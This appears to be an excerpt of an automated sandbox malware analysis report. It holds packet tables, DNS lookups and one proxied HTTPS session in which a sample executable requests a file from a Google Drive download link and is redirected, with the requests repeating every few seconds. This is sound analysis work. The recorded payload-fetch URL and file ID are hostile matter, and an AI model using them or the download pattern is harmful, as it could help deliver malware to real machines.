                                                        Jan 11, 2025 05:14:22.171745062 CET44350014142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:22.171813965 CET50014443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:22.173774004 CET50014443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:22.173796892 CET44350014142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:22.174061060 CET44350014142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:22.174113989 CET50014443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:22.174572945 CET50014443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:22.215344906 CET44350014142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:22.559890985 CET44350014142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:22.560069084 CET50014443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:22.560170889 CET50014443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:22.560205936 CET44350014142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:22.560261965 CET50014443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:22.567557096 CET50015443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:22.567595005 CET44350015172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:22.567682028 CET50015443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:22.567903042 CET50015443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:22.567914009 CET44350015172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:23.219281912 CET44350015172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:23.219388008 CET50015443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:23.219903946 CET50015443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:23.219916105 CET44350015172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:23.220082045 CET50015443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:23.220087051 CET44350015172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:23.642601967 CET44350015172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:23.642673016 CET44350015172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:23.642718077 CET50015443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:23.642736912 CET44350015172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:23.642748117 CET50015443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:23.642749071 CET44350015172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:23.642786026 CET50015443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:23.643443108 CET50015443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:23.643462896 CET44350015172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:33.663480043 CET50016443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:33.663528919 CET44350016142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:33.663661003 CET50016443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:33.664045095 CET50016443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:33.664072037 CET44350016142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:34.299854994 CET44350016142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:34.300038099 CET50016443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:34.300651073 CET44350016142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:34.300795078 CET50016443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:34.305495024 CET50016443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:34.305514097 CET44350016142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:34.305830002 CET44350016142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:34.305885077 CET50016443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:34.306766987 CET50016443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:34.347352028 CET44350016142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:34.691972971 CET44350016142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:34.692316055 CET50016443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:34.692382097 CET44350016142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:34.692465067 CET50016443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:34.692514896 CET50016443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:34.692651033 CET44350016142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:34.692800999 CET50016443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:34.699543953 CET50017443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:34.699579000 CET44350017172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:34.699656963 CET50017443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:34.699872017 CET50017443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:34.699882984 CET44350017172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:35.350193024 CET44350017172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:35.350249052 CET50017443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:35.350657940 CET50017443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:35.350672960 CET44350017172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:35.350838900 CET50017443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:35.350843906 CET44350017172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:35.775747061 CET44350017172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:35.775827885 CET44350017172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:35.775849104 CET50017443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:35.775871038 CET44350017172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:35.775880098 CET50017443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:35.775927067 CET44350017172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:35.775928020 CET50017443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:35.775974989 CET50017443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:35.776525974 CET50017443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:35.776542902 CET44350017172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:45.794132948 CET50018443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:45.794178963 CET44350018142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:45.794234037 CET50018443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:45.795047045 CET50018443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:45.795057058 CET44350018142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:46.448991060 CET44350018142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:46.449094057 CET50018443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:46.449812889 CET44350018142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:46.449861050 CET50018443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:46.451493025 CET50018443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:46.451508045 CET44350018142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:46.451778889 CET44350018142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:46.451821089 CET50018443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:46.452331066 CET50018443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:46.495341063 CET44350018142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:46.840450048 CET44350018142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:46.840707064 CET50018443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:46.840723038 CET44350018142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:46.840831041 CET50018443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:46.841183901 CET50018443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:46.841229916 CET44350018142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:46.841279030 CET50018443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:46.856570959 CET50019443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:46.856633902 CET44350019172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:46.856729984 CET50019443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:46.857117891 CET50019443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:46.857131958 CET44350019172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:47.496181011 CET44350019172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:47.496315002 CET50019443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:47.499134064 CET50019443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:47.499142885 CET44350019172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:47.499361992 CET50019443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:47.499367952 CET44350019172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:47.968718052 CET44350019172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:47.968782902 CET44350019172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:47.968806028 CET50019443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:47.968820095 CET44350019172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:47.968831062 CET50019443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:47.968872070 CET50019443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:47.969280005 CET50019443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:47.969319105 CET44350019172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:47.969379902 CET50019443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:57.991849899 CET50020443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:57.991894960 CET44350020142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:57.992000103 CET50020443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:57.992403984 CET50020443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:57.992414951 CET44350020142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:58.729253054 CET44350020142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:58.729324102 CET50020443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:58.730011940 CET44350020142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:58.730076075 CET50020443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:58.732019901 CET50020443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:58.732028961 CET44350020142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:58.732263088 CET44350020142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:58.732312918 CET50020443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:58.732729912 CET50020443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:58.775336027 CET44350020142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:59.116580009 CET44350020142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:59.116645098 CET50020443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:59.116667032 CET44350020142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:59.116708994 CET50020443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:59.116929054 CET50020443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:59.116970062 CET44350020142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:14:59.117022038 CET50020443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:14:59.121263027 CET50021443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:59.121295929 CET44350021172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:59.121378899 CET50021443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:59.121598005 CET50021443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:59.121608019 CET44350021172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:59.770848036 CET44350021172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:59.770968914 CET50021443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:59.772833109 CET50021443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:59.772842884 CET44350021172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:59.773159981 CET44350021172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:14:59.773211956 CET50021443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:59.773706913 CET50021443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:14:59.815366983 CET44350021172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:15:00.195310116 CET44350021172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:15:00.195384979 CET44350021172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:15:00.195410967 CET50021443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:15:00.195425987 CET44350021172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:15:00.195437908 CET50021443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:15:00.195475101 CET50021443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:15:00.195480108 CET44350021172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:15:00.195508957 CET44350021172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:15:00.195518970 CET50021443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:15:00.195550919 CET50021443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:15:00.196166992 CET50021443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:15:00.196180105 CET44350021172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:15:10.210444927 CET50022443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:15:10.210491896 CET44350022142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:15:10.210602045 CET50022443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:15:10.211008072 CET50022443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:15:10.211019039 CET44350022142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:15:10.857675076 CET44350022142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:15:10.857803106 CET50022443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:15:10.858474016 CET44350022142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:15:10.858550072 CET50022443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:15:10.860014915 CET50022443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:15:10.860024929 CET44350022142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:15:10.860260963 CET44350022142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:15:10.860307932 CET50022443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:15:10.860605001 CET50022443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:15:10.903331995 CET44350022142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:15:11.252351046 CET44350022142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:15:11.252486944 CET50022443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:15:11.252509117 CET44350022142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:15:11.252557993 CET50022443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:15:11.252697945 CET50022443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:15:11.252734900 CET44350022142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:15:11.252788067 CET50022443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:15:11.257592916 CET50023443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:15:11.257637024 CET44350023172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:15:11.257728100 CET50023443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:15:11.257977962 CET50023443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:15:11.257991076 CET44350023172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:15:11.894073009 CET44350023172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:15:11.894131899 CET50023443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:15:11.894716024 CET50023443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:15:11.894722939 CET44350023172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:15:11.894944906 CET50023443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:15:11.894951105 CET44350023172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:15:12.324805021 CET44350023172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:15:12.324866056 CET44350023172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:15:12.324911118 CET50023443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:15:12.324923992 CET44350023172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:15:12.324940920 CET50023443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:15:12.324975967 CET44350023172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:15:12.324985027 CET50023443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:15:12.325021982 CET50023443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:15:12.325597048 CET50023443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:15:12.325611115 CET44350023172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:15:22.336889029 CET50024443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:15:22.336920977 CET44350024142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:15:22.337007999 CET50024443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:15:22.337608099 CET50024443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:15:22.337621927 CET44350024142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:15:22.993096113 CET44350024142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:15:22.993189096 CET50024443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:15:22.993917942 CET44350024142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:15:22.994282007 CET50024443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:15:22.996448040 CET50024443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:15:22.996455908 CET44350024142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:15:22.996726036 CET44350024142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:15:22.996778011 CET50024443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:15:22.997122049 CET50024443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:15:23.039365053 CET44350024142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:15:23.381442070 CET44350024142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:15:23.381510973 CET50024443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:15:23.381520987 CET44350024142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:15:23.381577015 CET50024443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:15:23.381732941 CET50024443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:15:23.381767988 CET44350024142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:15:23.381829023 CET50024443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:15:23.387370110 CET50025443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:15:23.387397051 CET44350025172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:15:23.387470961 CET50025443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:15:23.387687922 CET50025443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:15:23.387700081 CET44350025172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:15:24.025940895 CET44350025172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:15:24.026103020 CET50025443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:15:24.026644945 CET50025443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:15:24.026649952 CET44350025172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:15:24.026827097 CET50025443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:15:24.026833057 CET44350025172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:15:24.486946106 CET44350025172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:15:24.487021923 CET44350025172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:15:24.487046957 CET50025443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:15:24.487061024 CET44350025172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:15:24.487085104 CET44350025172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:15:24.487092972 CET50025443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:15:24.487108946 CET50025443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:15:24.487145901 CET50025443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:15:24.487659931 CET50025443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:15:24.487673044 CET44350025172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:15:34.508030891 CET50026443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:15:34.508084059 CET44350026142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:15:34.508155107 CET50026443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:15:34.508481026 CET50026443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:15:34.508491039 CET44350026142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:15:35.147130966 CET44350026142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:15:35.147350073 CET50026443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:15:35.148000956 CET44350026142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:15:35.148057938 CET50026443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:15:35.201793909 CET50026443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:15:35.201814890 CET44350026142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:15:35.202069998 CET44350026142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:15:35.202117920 CET50026443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:15:35.202449083 CET50026443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:15:35.243330002 CET44350026142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:15:35.531332970 CET44350026142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:15:35.531440973 CET50026443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:15:35.531461000 CET44350026142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:15:35.531507969 CET50026443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:15:35.531563997 CET50026443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:15:35.531599998 CET44350026142.250.184.206192.168.2.4
                                                        Jan 11, 2025 05:15:35.531658888 CET50026443192.168.2.4142.250.184.206
                                                        Jan 11, 2025 05:15:35.536382914 CET50027443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:15:35.536427975 CET44350027172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:15:35.536489964 CET50027443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:15:35.536789894 CET50027443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:15:35.536803007 CET44350027172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:15:36.193505049 CET44350027172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:15:36.193587065 CET50027443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:15:36.194144011 CET50027443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:15:36.194152117 CET44350027172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:15:36.194305897 CET50027443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:15:36.194310904 CET44350027172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:15:36.616132021 CET44350027172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:15:36.616199017 CET44350027172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:15:36.616219997 CET50027443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:15:36.616250038 CET44350027172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:15:36.616266966 CET50027443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:15:36.616348028 CET44350027172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:15:36.616395950 CET50027443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:15:36.616995096 CET50027443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:15:36.617012978 CET44350027172.217.16.193192.168.2.4
                                                        Jan 11, 2025 05:15:36.617026091 CET50027443192.168.2.4172.217.16.193
                                                        Jan 11, 2025 05:15:36.617054939 CET50027443192.168.2.4172.217.16.193

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Jan 11, 2025 05:13:08.244750977 CET5614853192.168.2.41.1.1.1
                                                        Jan 11, 2025 05:13:08.251501083 CET53561481.1.1.1192.168.2.4
                                                        Jan 11, 2025 05:13:09.551736116 CET5428353192.168.2.41.1.1.1
                                                        Jan 11, 2025 05:13:09.558438063 CET53542831.1.1.1192.168.2.4

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Jan 11, 2025 05:13:08.244750977 CET192.168.2.41.1.1.10xaeb6Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                        Jan 11, 2025 05:13:09.551736116 CET192.168.2.41.1.1.10xd852Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Jan 11, 2025 05:13:08.251501083 CET1.1.1.1192.168.2.40xaeb6No error (0)drive.google.com142.250.184.206A (IP address)IN (0x0001)false
                                                        Jan 11, 2025 05:13:09.558438063 CET1.1.1.1192.168.2.40xd852No error (0)drive.usercontent.google.com172.217.16.193A (IP address)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • drive.google.com
                                                        • drive.usercontent.google.com

                                                        HTTPS Proxied Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.449736142.250.184.2064437776C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-11 04:13:09 UTC216OUTGET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        2025-01-11 04:13:09 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Sat, 11 Jan 2025 04:13:09 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-rvWTHAlv7r-6beiO0_MOGA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
